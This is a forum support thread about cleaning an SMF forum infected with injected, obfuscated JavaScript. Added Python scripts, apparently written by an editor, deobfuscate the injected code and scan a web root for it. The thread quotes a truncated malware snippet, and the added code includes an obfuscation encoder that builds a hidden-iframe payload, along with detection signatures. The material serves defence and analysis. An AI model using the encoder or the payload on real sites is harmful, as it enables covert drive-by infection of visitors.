Error in Sources Folder

Started by LeddaBlue, January 20, 2009, 05:57:02 PM


Rumbaar

Well, the fact you couldn't get package listings before that would indicate you weren't 100% before 1.1.7 either.  As for the warning only on the PC at work, I got it when I viewed your site source, and so did a fellow Support Specialist when they visited.  So I would guess something is amiss.

Using the large Upgrade Package to wipe all current contents and 'install' a fresh forum will ensure that all files are clean and without any malicious coding.  It should also solve any current source/template issues with the package manager.  You'll need to install those two mods back again, though.
"An important reward for a job well done is a personal sense of worthwhile achievement."

[ Themes ]

Rumbaar

#41
Looking at your source I get other errors; I guess it's possibly trying to access an exploit in Adobe Acrobat Reader.

In your source this doesn't look right:
<script language=javascript><!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))(unescape('$%2F~%2F&%3C%64%69%76~%20%73%74y`%6C%65%3D%64%69`sp%6Ca~y#%4E~%6.... contents removed ....1#%6De%2E$%63%68%61%72%41%74%28!0%29+%22|%3E%3C!%5C|%5C#/`%73cr#ip$%74%3E$%5C~%22#)%3C%5C@/%73%63%72%69@%70t%3E&")&%3B\n/|/%3C%2F~d`%69$%76~%3E').replace(/@|`|\&|#|\||~|\!|\$/g,""));var yahoo_counter=1;
<!-- counter end --></script>

Have you installed a Yahoo counter, and is that right?
"An important reward for a job well done is a personal sense of worthwhile achievement."

[ Themes ]
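The snippet quoted in the post above is the usual unescape()-plus-replace() obfuscation: the hidden HTML is percent-encoded, filler punctuation is sprinkled through it, and at page load the script decodes the string and deletes the filler with the regex in .replace(). The thread's copy is truncated ("contents removed"), so the decoder below, which is an added example and not code from the thread or from SMF, runs on a constructed payload it builds itself; PAYLOAD, the obfuscate() helper and all function names are assumptions. It pulls the unescape('...') argument and the .replace(/.../g, "") pattern out of the script text and recovers the hidden HTML without executing any JavaScript.

```python
import re
from urllib.parse import unquote

# unescape('...') with a single- or double-quoted JS string (escaped quotes allowed)
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])((?:\\.|(?!\1).)*)\1\s*\)""")
# .replace(/pattern/flags, "") chained after it: the filler-stripping step
REPLACE_EMPTY = re.compile(r"""\.replace\(\s*/((?:\\.|[^/])*)/([a-z]*)\s*,\s*(['"])\3\s*\)""")

JS_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "\\": "\\", "'": "'", '"': '"', "/": "/"}


def js_string_literal(body: str) -> str:
    """Undo the common backslash escapes of a JS string literal (no \\x/\\u forms)."""
    return re.sub(r"\\(.)", lambda m: JS_ESCAPES.get(m.group(1), m.group(1)), body, flags=re.S)


def js_unescape(s: str) -> str:
    """Mimic JavaScript unescape(): %XX is one code unit (not UTF-8), %uXXXX one char."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")


def filler_chars(js_pattern: str) -> set:
    """Turn an alternation of single characters such as @|`|\\&|#|\\| into the set it deletes."""
    alts, cur, i = [], "", 0
    while i < len(js_pattern):
        c = js_pattern[i]
        if c == "\\" and i + 1 < len(js_pattern):   # \& \| \! \$ are literal characters
            cur += js_pattern[i + 1]
            i += 2
            continue
        if c == "|":
            alts.append(cur)
            cur = ""
        else:
            cur += c
        i += 1
    alts.append(cur)
    if any(len(a) != 1 for a in alts):
        raise ValueError(f"not a single-character alternation: /{js_pattern}/")
    return set(alts)


def deobfuscate(js: str) -> str:
    """Recover the text a unescape(...).replace(...) snippet would write into the page."""
    m = UNESCAPE_CALL.search(js)
    if not m:
        raise ValueError("no unescape('...') call found")
    text = js_unescape(js_string_literal(m.group(2)))
    r = REPLACE_EMPTY.search(js, m.end())
    if r:  # the chained replace deletes the filler characters; do the same
        drop = filler_chars(r.group(1))
        text = "".join(ch for ch in text if ch not in drop)
    return text


# --- constructed sample (made up for this example; the thread's payload is truncated) ---
FILLER = "@`&#|~!$"                       # the eight characters the thread's regex deletes
FILLER_JS_REGEX = r"@|`|\&|#|\||~|\!|\$"  # the same alternation, as written in the snippet
PAYLOAD = '<div style="display:none"><iframe src="http://example.invalid/x.html" width=1 height=1></iframe></div>'


def obfuscate(payload: str, every: int = 3) -> str:
    """Assumed mimic of the injector's encoder: insert a filler character after every
    `every` payload characters, then percent-encode every other character.
    The payload must not contain filler characters, '%' or a single quote."""
    if any(c in FILLER or c in "%'" for c in payload):
        raise ValueError("payload contains a reserved character")
    salted = "".join(
        (FILLER[i % len(FILLER)] if i and i % every == 0 else "") + ch
        for i, ch in enumerate(payload)
    )
    encoded = "".join(f"%{ord(c):02X}" if i % 2 else c for i, c in enumerate(salted))
    return "unescape('" + encoded + "').replace(/" + FILLER_JS_REGEX + '/g,"")'


SAMPLE_JS = obfuscate(PAYLOAD)   # what an infected page would carry; deobfuscate() reverses it
```

Paste a real script body into deobfuscate() to see what it injects; nothing is evaluated, so this is safe on the analyst's workstation. Note that the filler set is chosen by the injector so that none of those characters occur in the hidden HTML, which is why a plain alternation of punctuation works as the strip step.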

LeddaBlue

Yeah, that looks strange. I never installed a counter from Yahoo; I use the counter in my control panel with my host, which isn't on my site directly.  I installed a counter a long time ago, but it was on my main site, which is just www.fishenchantment.com, not on the forum.

My host did contact me and told me I have to run a virus scan of all the contents of my site to find the malicious code; they assured me it was not on their end, which is what I initially thought.

Where did you find that Yahoo counter code?

I'm going ahead with the large upgrade today and I'll let you know if I have any issues.  Thank you for all your help.
 
butterfly in the wind without a care...

www.fishenchantment.com

LeddaBlue

OK, evidently that code you posted is the malicious code, because I cannot even view page three of this thread and I get that same error from AVG.
butterfly in the wind without a care...

www.fishenchantment.com

Rumbaar

Well, where it's stored could be in your root index.php file or, most likely, your theme's index.template.php file.

Now how it was injected should be looked at.  It could be from an insecure host, or it could be via a malicious file uploaded to your forum.  You allow attachments, so be sure to check those folders.
"An important reward for a job well done is a personal sense of worthwhile achievement."

[ Themes ]

LeddaBlue

So if I do the large upgrade, will this fix my problem? I sure hope so... I have to get stuff backed up so I can do the upgrade; I'm almost done.
butterfly in the wind without a care...

www.fishenchantment.com

John Eric

Quote from: LeddaBlue on February 23, 2009, 05:41:04 PM
So if I do the large upgrade, will this fix my problem? I sure hope so... I have to get stuff backed up so I can do the upgrade; I'm almost done.

The only fix is to erase all and begin with a new SMF only.
See, copying the "big update" =

Admin.php (bad)   --> Admin.php (ok)
Display.php (bad) --> Display.php (ok)
???                   Nasty.php

Clean all!
Greetings, and good luck with your big effort.

Rumbaar

Well, in theory you're overwriting all the files in your forum with fresh ones from the large upgrade package, so it should eliminate any files tainted with this malicious code.

But ultimately, if they were able to do it once, they might be able to do it again.  Finding out how will help prevent it in the future.

Check your files outside of SMF for any malicious files, also check your attachment folders.
"An important reward for a job well done is a personal sense of worthwhile achievement."

[ Themes ]

LeddaBlue

#48
OK, I will check all of my files. I don't know; I already checked my SMF files and could not find that code. This just sucks....

So does that mean if I do a large upgrade I lose my forum and all the info? Would I be starting from scratch?

butterfly in the wind without a care...

www.fishenchantment.com

John Eric

Also, on the PDF exploit, read http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9128428 !
Always say no to JS as the first setting.

Yes Rumbaar, but a new file could be sleeping; then the thief just:

http://www.yoursite.com/forum/sneaky.gif <-- yes! it could be .gif!

sneaky.gif/php can include Settings.php and then have the database, or edit index.php any day.

-> LeddaBlue
You will not start from scratch, as you have more knowledge today than yesterday (and scratching is good anyway for music and prevents more itch). List all of your mods and then strike the mods you can avoid, keeping only the utmost important ones. FEW MODS = good.

Just do not lose your Settings.php (but always examine it carefully for strange insertions and verify CHMOD != 777, even if you have to do the big chore of chmod, change, then chmod again).

Rumbaar

You will not lose your forum if you use the large upgrade package.  The only folder you might want to keep is your attachment folder, but yes, check this one for rogue files.  Then check your Settings.php and Settings_bak.php files, and you can delete the rest.

Once you've uploaded the new fresh files, with the old details in your Settings.php file, you'll be at the fresh stage of an SMF forum install but will have all your forum data from before the refresh.

Be sure to fully back up your files/folders before this, so you can recover individual files if needed.
"An important reward for a job well done is a personal sense of worthwhile achievement."

[ Themes ]

LeddaBlue

thank you, I will let you know how it goes (fingers crossed)
butterfly in the wind without a care...

www.fishenchantment.com

LeddaBlue

Okay, I'm a little confused but very HAPPY! Today I signed into my admin panel of SMF and I noticed a red box with an alert that the current version of SMF, 1.1.7, was out of date and has bugs; there was also a link that said UPDATE NOW.  So I clicked the link and it downloaded the package and voila! It upgraded my SMF to 1.1.8 and I can see my package manager again.  The malicious code is gone and everything is working fine.  I think I did find where they put the malicious code: I think I found it in my Settings.php file in my main forum folder.

So this is the response from my host today:
Thank you for using our services.

The malware code was inserted into the PHP code of the fishenchantment.com/SMF/Settings.php script due to the 775 permissions which you have set on it. So in order to resolve this issue you should open this script, remove the malware code and set 644 permissions on it.

If you should need further assistance please don't hesitate to contact us again, we are available 24/7.

butterfly in the wind without a care...

www.fishenchantment.com

LeddaBlue

I remember you all telling me to set the permissions at 777; I wonder why they said 644?
butterfly in the wind without a care...

www.fishenchantment.com

Rumbaar

On most secure and correctly configured hosts, 777 shouldn't be an issue.  If it's an issue, then a person who can exploit it can do more than just insert code.

If it's set to 644, you won't be able to alter it via the forum, and any future changes will need to be done manually.
"An important reward for a job well done is a personal sense of worthwhile achievement."

[ Themes ]

LeddaBlue

That's what I was afraid of, so I should have them set to 777? I guess I had them set to 775; I wonder how that was changed.
butterfly in the wind without a care...

www.fishenchantment.com

Rumbaar

No, that file can be at 644 or 755 without, I think, adverse effect on your forum.

But other files, like index.template.php, are targeted by these people as well, usually any file that is always loaded by the forum and writeable.
"An important reward for a job well done is a personal sense of worthwhile achievement."

[ Themes ]
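Rumbaar's point just above (look at every file the forum always loads and that is writeable), John Eric's earlier point about a PHP script hiding behind a .gif name in the attachment folder, and the host's finding of a group-writable Settings.php all reduce to one triage pass over the web root. The script below is an added example, not code from the thread or from SMF: it walks a directory, flags files writable by group or other, flags image-named files that contain a PHP open tag, and greps .php/.html/.js files for the unescape().replace() pattern and the yahoo_counter marker seen in this thread plus an eval(base64_decode( signature, which is an assumed extra not mentioned on the page. demo() builds a constructed directory tree in a temporary folder so it runs offline; every file name and content in it is made up, and the hidden shell merely does the include of Settings.php that John Eric describes.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Text signatures. The first two come from the injected script in this thread;
# the third is an assumed extra, a common PHP backdoor loader not mentioned on the page.
SIGNATURES = [
    ("unescape().replace() obfuscation", re.compile(r"unescape\(.*?\)\s*\.replace\(", re.S)),
    ("yahoo_counter marker", re.compile(r"yahoo_counter")),
    ("eval(base64_decode( loader", re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)),
]
SCRIPT_EXT = {".php", ".html", ".htm", ".js"}
IMAGE_EXT = {".gif", ".jpg", ".jpeg", ".png"}
PHP_OPEN = re.compile(rb"<\?php|<\?=")


def scan(root, fix: bool = False) -> list:
    """Walk `root` and return (relative path, finding) pairs.
    With fix=True, every file writable by group/other is chmod'ed to 644; directories
    are left alone so the attachment upload directory keeps working."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        mode = stat.S_IMODE(path.stat().st_mode)
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((rel, f"writable by group/other (mode {mode:o})"))
            if fix:
                os.chmod(path, 0o644)
        data = path.read_bytes()
        ext = path.suffix.lower()
        if ext in IMAGE_EXT and PHP_OPEN.search(data):
            findings.append((rel, "PHP code inside an image file"))
        if ext in SCRIPT_EXT:
            text = data.decode("utf-8", "replace")
            for name, rx in SIGNATURES:
                if rx.search(text):
                    findings.append((rel, f"matches {name}"))
    return findings


def demo() -> dict:
    """Constructed tree mimicking the thread: an injected, group-writable Settings.php,
    a PHP file named .gif in the attachment folder, and a clean theme template.
    Returns the findings before and after the permission fix."""
    injected = (
        "<?php $db_user = 'smf'; ?>\n"
        "<script>if(typeof(yahoo_counter)!=typeof(1))"
        "(unescape('%3Cdiv%3E').replace(/@|~/g,\"\"));</script>\n"
    )
    files = {
        "SMF/Settings.php": (injected.encode(), 0o775),
        "SMF/attachments/sneaky.gif": (b"GIF89a<?php include 'Settings.php'; ?>", 0o644),
        "SMF/Themes/default/index.template.php": (b"<?php function template_main() {} ?>", 0o644),
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, (content, mode) in files.items():
            p = Path(tmp, rel)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_bytes(content)
            os.chmod(p, mode)
        before = scan(tmp)
        scan(tmp, fix=True)        # apply the host's chmod 644 advice to flagged files
        after = scan(tmp)
    return {"before": before, "after": after}


if __name__ == "__main__":
    for phase, items in demo().items():
        print(phase)
        for rel, msg in items:
            print(f"  {rel}: {msg}")
```

Run scan('/path/to/webroot') against a copy of the site first; the text signatures only catch what this thread saw, so a clean report is not proof of a clean site, and a hit on a file you never edited is. fix=True is the equivalent of the host's advice applied to every flagged file, after which, as Rumbaar notes, SMF can no longer rewrite Settings.php from the admin panel and such changes have to be made by hand.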
